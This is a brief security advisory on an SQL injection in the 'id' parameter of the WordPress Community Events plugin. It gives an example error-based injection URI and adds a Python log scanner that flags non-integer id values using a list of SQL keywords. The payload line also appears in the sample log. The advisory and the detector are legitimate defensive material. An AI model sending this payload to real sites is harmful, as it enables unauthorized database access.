WordPress Community Events Plugin 'id' Parameter SQL Injection Vulnerability

The following example URI is available:

http://www.example.com/wp-content/plugins/community-events/tracker.php?id=-1 AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20
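
A defender-side check for this issue, added here as an example that is not part of the original advisory: it scans web access logs for requests to tracker.php whose id parameter is anything other than a plain integer, which is the shape of the URI above. The combined log format, the token list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter taken from the advisory's example URI.
TRACKER_PATH = "/wp-content/plugins/community-events/tracker.php"
PARAM = "id"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Tokens that never belong in a numeric identifier; used only to annotate hits.
SQL_TOKENS = re.compile(r"\b(and|or|union|select|extractvalue|updatexml|concat|char|sleep)\b|@@|--|/\*", re.I)


def check_target(target):
    """Return a list of findings for one request target; empty when clean."""
    parts = urlsplit(target)
    if not parts.path.endswith(TRACKER_PATH):
        return []
    findings = []
    # parse_qs percent-decodes each value and turns '+' into a space.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # a plain non-negative integer is the only expected shape
        tokens = sorted({m.group(0).lower() for m in SQL_TOKENS.finditer(value)})
        findings.append({"value": value, "sql_tokens": tokens})
    return findings


def scan(lines):
    """Yield (line_number, finding) for every flagged access log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            for finding in check_target(match.group("target")):
                yield number, finding


# Constructed sample log lines (not from the advisory); 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /wp-content/plugins/community-events/tracker.php?id=12 HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /wp-content/plugins/community-events/tracker.php?id=-1%20AND%20EXTRACTVALUE(1,%20CONCAT(CHAR(58),@@version,CHAR(58)))--%20 HTTP/1.1" 200 87',
    '192.0.2.10 - - [01/Jan/2010:10:00:09 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```

The integer-only test is the primary signal; the token list only annotates a hit and is not a complete filter, so a flagged request with no tokens still deserves a look.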


 

Copyright 2010, SecurityFocus